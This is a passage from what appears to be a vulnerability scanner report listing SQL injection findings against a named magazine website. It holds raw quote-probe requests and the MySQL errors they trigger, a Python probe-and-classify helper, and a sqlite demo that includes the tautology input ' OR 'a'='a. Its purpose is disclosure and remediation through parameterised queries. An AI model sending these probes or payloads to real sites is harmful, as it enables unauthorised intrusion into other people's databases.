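    m = MYSQL_SYNTAX_ERROR.search(body)
    return (m.group("near"), int(m.group("line"))) if m else None


def classify(body_single, body_double):
    """The scanner's rule: an error on ' but not on '' means the quote is being
    spliced into SQL and '' is parsed as an escaped quote. An error on both
    usually means the page errors regardless of input, so look by hand."""
    e1, e2 = sql_error(body_single), sql_error(body_double)
    if e1 and not e2:
        return "candidate"
    if e1 and e2:
        return "error-on-both"
    return "no-evidence"


def http_get(url):
    """Plain GET returning the body even on 4xx/5xx, since error pages are the signal."""
    try:
        with urllib.request.urlopen(url, timeout=10) as r:
            return r.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as e:
        return e.read().decode("utf-8", "replace")


def run_check(url, param=None, fetch=http_get):
    """Fetch both probes and classify; fetch is injectable for offline use."""
    single, double = probe_urls(url, param)
    return classify(fetch(single), fetch(double))


# Constructed sample bodies, copied from Response 1 and Response 2 above.
RESP_SINGLE = (
    "<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> "
    "[<font color=000077>You have an error in your SQL syntax; check the manual "
    "that corresponds to your MySQL server version for the right syntax to use "
    "near '' AND cookie_info=''' at line 1</font>"
)
RESP_DOUBLE = (
    '<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" '
    '"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">'
)

if __name__ == "__main__":
    print(sql_error(RESP_SINGLE))              # ("' AND cookie_info=''", 1)
    print(classify(RESP_SINGLE, RESP_DOUBLE))  # candidate
```

A "candidate" result is only the scanner's starting point: it proves the quote reaches the SQL parser, not what an attacker can do from there, which is why the issue text still asks for manual review of the error and of the other inputs the same query consumes.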

Request 1

GET /features/technical?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:20:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:20:07 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /features/technical?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:20:09 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:20:09 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.87. http://www.soundingsonline.com/features/type-of-boat [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /features/type-of-boat

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared: MySQL reads '' inside a string literal as an escaped quote, so the statement parses again, which shows the input is being spliced into a quoted SQL literal. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present. As in the other findings for this host, the error text ends in AND cookie_info='', a column no request parameter refers to, so the quote is reaching a query the application appears to build for every request; the injection point is the URL as a whole, not this parameter in particular.

The database appears to be MySQL.

Remediation detail

The application should pass request data, including the request URI and cookie values, to the database only through parameterised queries (prepared statements); escaping one parameter or hiding the error message leaves the injection in place. It should also handle errors gracefully and prevent SQL error messages from being returned in responses, since the message discloses the structure of the failing statement.

Request 1

GET /features/type-of-boat?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:48 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /features/type-of-boat?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:51 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.88. http://www.soundingsonline.com/index.php [Itemid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /index.php

Issue detail

The Itemid parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Itemid parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared: MySQL reads '' inside a string literal as an escaped quote, so the statement parses again, which shows the input is being spliced into a quoted SQL literal. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present. Here the error text reproduces the full request line, /index.php?option=com_content&view=category&layout=blog&id=98&Itemid=111', inside the failing statement, so the application is concatenating the request URI into a query; every parameter in the URL, and the parameter names themselves, reach the same sink, which is why the scanner reports one finding per parameter for this host.

The database appears to be MySQL.

Remediation detail

The application should pass request data, including the request URI and cookie values, to the database only through parameterised queries (prepared statements); escaping the Itemid value alone, or hiding the error message, leaves the injection in place. It should also handle errors gracefully and prevent SQL error messages from being returned in responses, since the message discloses the structure of the failing statement.
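The pattern this error text implies, beside its parameterised fix, as an added example that is not the site's code (the report does not show that code). Python's sqlite3 stands in for MySQL: both treat '' inside a string literal as an escaped quote, which is what makes the scanner's quote pair diagnostic. The column name cookie_info is taken from the error message; the table name visits, the uri column and the single stored row are assumed for the example. The third input shows why the '' request going quiet is not a sign of safety.

```python
import sqlite3

# SQLite stands in for MySQL here; both treat '' inside a string literal as
# an escaped quote. The column name cookie_info is taken from the error
# message in the report; the table name visits and the uri column are assumed.
STORED_URI = "/index.php?option=com_content&view=category&layout=blog&id=98&Itemid=111"


def make_db():
    """In-memory stand-in table with one stored request, constructed for the example."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE visits (uri TEXT, cookie_info TEXT)")
    con.execute("INSERT INTO visits VALUES (?, ?)", (STORED_URI, ""))
    return con


def vulnerable_lookup(con, request_uri, cookie_info=""):
    """The pattern the error text implies: the raw request URI is concatenated
    into the statement. One quote ends the literal early and the remainder no
    longer parses; '' is read as an escaped quote, so the statement parses
    again even though the input still controls the SQL."""
    sql = (f"SELECT COUNT(*) FROM visits "
           f"WHERE uri='{request_uri}' AND cookie_info='{cookie_info}'")
    return con.execute(sql).fetchone()[0]


def safe_lookup(con, request_uri, cookie_info=""):
    """Parameterised form: values travel separately from the statement text,
    so no input character can change the query's structure."""
    sql = "SELECT COUNT(*) FROM visits WHERE uri=? AND cookie_info=?"
    return con.execute(sql, (request_uri, cookie_info)).fetchone()[0]


def outcome(lookup, con, request_uri):
    """('ok', row_count) on success, ('error', exception class name) on a
    database error: the same error / no-error signal the scanner keys on,
    plus the count so that a structural change to the query is visible."""
    try:
        return ("ok", lookup(con, request_uri))
    except sqlite3.Error as e:
        return ("error", type(e).__name__)


if __name__ == "__main__":
    con = make_db()
    for uri in (STORED_URI + "'", STORED_URI + "''", "' OR 'a'='a"):
        print(repr(uri),
              "concatenated:", outcome(vulnerable_lookup, con, uri),
              "parameterised:", outcome(safe_lookup, con, uri))
```

With the concatenated query the single quote raises a syntax error and the doubled quote runs cleanly, exactly the pair of responses recorded for this issue, while the input ' OR 'a'='a runs cleanly and matches the stored row it should not match. The parameterised version returns zero matches for all three inputs because each is compared as a literal value.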

Request 1

GET /index.php?option=com_content&view=category&layout=blog&id=98&Itemid=111' HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:16 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''/index.php?option=com_content&view=category&layout=blog&id=98&Itemid=111'' AND ' at line 1</font>
...[SNIP]...

Request 2

GET /index.php?option=com_content&view=category&layout=blog&id=98&Itemid=111'' HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:17 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.89. http://www.soundingsonline.com/index.php [chronoformname parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /index.php

Issue detail

The chronoformname parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the chronoformname parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared: MySQL reads '' inside a string literal as an escaped quote, so the statement parses again, which shows the input is being spliced into a quoted SQL literal. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present. Here the error text reproduces the full request line, /index.php?option=com_chronocontact&chronoformname=CGPage', followed by AND cookie_info='', inside the failing statement, so the application is concatenating the request URI into a query; the chronoformname value is only one route into that sink.

The database appears to be MySQL.

Remediation detail

The application should pass request data, including the request URI and cookie values, to the database only through parameterised queries (prepared statements); escaping the chronoformname value alone, or hiding the error message, leaves the injection in place. It should also handle errors gracefully and prevent SQL error messages from being returned in responses, since the message discloses the structure of the failing statement.

Request 1

GET /index.php?option=com_chronocontact&chronoformname=CGPage' HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:25 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''/index.php?option=com_chronocontact&chronoformname=CGPage'' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /index.php?option=com_chronocontact&chronoformname=CGPage'' HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:26 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.90. http://www.soundingsonline.com/index.php [id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /index.php

Issue detail

The id parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the id parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared: MySQL reads '' inside a string literal as an escaped quote, so the statement parses again, which shows the input is being spliced into a quoted SQL literal. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present. The error text ends in AND cookie_info='', a column unrelated to the id parameter; together with the errors for 1.88 and 1.89, which reproduce the whole request URI, this indicates the request URI as a whole is concatenated into a query the application builds for every request, so the parameters reported for this host are all the same flaw.

The database appears to be MySQL.

Remediation detail

The application should pass request data, including the request URI and cookie values, to the database only through parameterised queries (prepared statements); escaping the id value alone, or hiding the error message, leaves the injection in place. It should also handle errors gracefully and prevent SQL error messages from being returned in responses, since the message discloses the structure of the failing statement.

Request 1

GET /index.php?option=com_content&view=category&layout=blog&id=98'&Itemid=111 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:14 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /index.php?option=com_content&view=category&layout=blog&id=98''&Itemid=111 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:15 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.91. http://www.soundingsonline.com/index.php [layout parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /index.php

Issue detail

The layout parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the layout parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared: MySQL reads '' inside a string literal as an escaped quote, so the statement parses again, which shows the input is being spliced into a quoted SQL literal. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present. The error text ends in AND cookie_info='', a column unrelated to the layout parameter; together with the errors for 1.88 and 1.89, which reproduce the whole request URI, this indicates the request URI as a whole is concatenated into a query the application builds for every request, so the parameters reported for this host are all the same flaw.

The database appears to be MySQL.

Remediation detail

The application should pass request data, including the request URI and cookie values, to the database only through parameterised queries (prepared statements); escaping the layout value alone, or hiding the error message, leaves the injection in place. It should also handle errors gracefully and prevent SQL error messages from being returned in responses, since the message discloses the structure of the failing statement.

Request 1

GET /index.php?option=com_content&view=category&layout=blog'&id=98&Itemid=111 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:12 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /index.php?option=com_content&view=category&layout=blog''&id=98&Itemid=111 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:13 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.92. http://www.soundingsonline.com/index.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /index.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared: MySQL reads '' inside a string literal as an escaped quote, so the statement parses again, which shows the input is being spliced into a quoted SQL literal. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present. The error text ends in AND cookie_info='', a column that no request parameter refers to; together with the errors for 1.88 and 1.89, which reproduce the whole request URI, this indicates the URL as a whole is concatenated into a query the application builds for every request, which is why a parameter name the application never reads still reaches the database.

The database appears to be MySQL.

Remediation detail

The application should pass request data, including the request URI and cookie values, to the database only through parameterised queries (prepared statements); escaping individual parameters, or hiding the error message, leaves the injection in place. It should also handle errors gracefully and prevent SQL error messages from being returned in responses, since the message discloses the structure of the failing statement.

Request 1

GET /index.php?option=com_chronocontact&chronoformname=CGPage&1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:33 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /index.php?option=com_chronocontact&chronoformname=CGPage&1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:34 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.93. http://www.soundingsonline.com/index.php [option parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /index.php

Issue detail

The option parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the option parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared: MySQL reads '' inside a string literal as an escaped quote, so the statement parses again, which shows the input is being spliced into a quoted SQL literal. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present. The error text ends in AND cookie_info='', a column unrelated to the option parameter; together with the errors for 1.88 and 1.89, which reproduce the whole request URI, this indicates the request URI as a whole is concatenated into a query the application builds for every request, so the parameters reported for this host are all the same flaw.

The database appears to be MySQL.

Remediation detail

The application should pass request data, including the request URI and cookie values, to the database only through parameterised queries (prepared statements); escaping the option value alone, or hiding the error message, leaves the injection in place. It should also handle errors gracefully and prevent SQL error messages from being returned in responses, since the message discloses the structure of the failing statement.

Request 1

GET /index.php?option=com_chronocontact'&chronoformname=CGPage HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
